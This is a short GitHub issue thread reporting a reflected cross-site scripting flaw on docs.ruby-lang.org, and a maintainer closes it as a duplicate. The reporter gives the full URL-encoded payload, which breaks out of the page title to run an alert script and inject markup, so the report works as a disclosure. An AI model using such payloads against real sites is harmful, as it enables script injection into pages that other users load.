### ISSUE TITLE
XSS

### ISSUE THREAD

**Issue by TheGirdap** [ruby/www.ruby-lang.org#1735]
Hello,

Reflected Xss Found. ..

Steps;

I scanned the subdomain and did some research on "query".

I targeted Callbacks and achieved this goal;

https://docs.ruby-lang.org/ja/search/query:import/query:callback

then with the necessary tests

https://docs.ruby-lang.org/ja/search/query:import/query:callback/%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D

I reach the conclusion ...

SS :

![ekran_resmi_2018-01-24_01 09 36 1](https://user-images.githubusercontent.com/35760403/35325867-0b93be3e-0106-11e8-88f1-37d7e0b5952e.png)

search:
import "wanted" + payload = reflected ...

**Comment by hsbt** [comment]
Duplicates of https://github.com/ruby/www.ruby-lang.org/issues/1734
